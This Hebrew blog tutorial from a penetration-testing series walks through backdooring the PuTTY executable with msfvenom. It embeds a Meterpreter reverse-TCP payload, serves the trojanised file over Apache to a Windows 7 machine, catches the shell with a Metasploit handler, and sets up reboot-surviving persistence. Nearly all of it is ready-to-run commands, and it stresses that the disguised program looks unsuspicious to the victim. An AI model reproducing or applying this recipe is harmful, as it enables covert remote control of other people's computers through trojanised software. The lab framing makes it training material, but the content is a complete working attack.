Home אבטחת מידעPenetration Testing - Offense Backdooring EXE באמצעות Msfvenom וביצוע Trojan על Putty.exe

Backdooring EXE באמצעות Msfvenom וביצוע Trojan על Putty.exe

by Tal Ben Shushan 27/04/2018 0 comment
Backdooring EXE באמצעות Msfvenom וביצוע Trojan על Putty.exe
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

Backdooring EXE באמצעות Msfvenom לקובץ תמים – Putty.exe


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit


במאמר זה נראה כיצד להכניס Payload.exe לתוך קובץ תמים למשל כמו Putty ובכך "לרמות" את המשתמש וברגע שהוא יפעיל אותו ה Handler אצלנו ב Metasploit יאזין ונקבל גישה Meterpreter מלאה.

תחילה נוריד את הקובץ Putty אל המערכת

sudo wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

ונפעיל את שרת ה Apache

sudo systemctl start apache2

כעת נכניס את ה Payload אל תוך ה Putty ונקרא לקובץ שיצא Puttyx

*כתובת ה IP 192.168.31.162, זה ההכתובת של Kali שלנו

sudo msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.31.162 lport=5555 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyx.exe

כעת, נפעיל Handler שימתין כאשר המטרה תלחץ על הקובץ

sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.162
set lport=5555
exploit

כעת נגיע לנתיב

/root

או פשוט להפעיל את סייר התיקיות ולהגיע ל Home, שם נמצא את הקובץ שיצרנו הרגע – משילוב של Putty ו Payload

בצעו לקובץ העתק או גזור

כעת נעבור לנתיב

/var/www/html

ונעתיק את ה Puttyx לנתיב הזה

כעת נעבור למערכת ה Windows 7 נפעיל את Internet Explorer ונכנס לנתיב בו נמצא Puttyx

http://192.168.31.162/puttyx.exe

נשמור את הקובץ בשולחן העבודה

ונפעיל אותו

נראה שעלה לנו Putty, והכל לא נראה חשוד

נחזור לKali שלנו, והופ, קיבלנו גישת Meterpreter מלאה על המערכת!! 🙂

BackDooring

כעת ניצור מצב שבו גם אם המשתמש לא יפעיל בפעם הבאה את PuttyX נוכל לקבל גישת Meterpreter נשתמש בכלי שיפעיל Payload כל 5 שניות וינסה להתקשר עם ה Handler שנפעיל שכן הוא Reverse_TCP והוא יצור איתנו קשר

הכתובת IP היא של הקאלי

run persistence -U -i 5 -p 443 -r 192.168.31.16

כעת ניצור Handler

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

exploit -j

set LHOST 192.168.31.162

set LPORT 443

בצעו ריסטארט למחשב והמתינו לפתיחת ה Session

מאמרים קשורים

Leave a Comment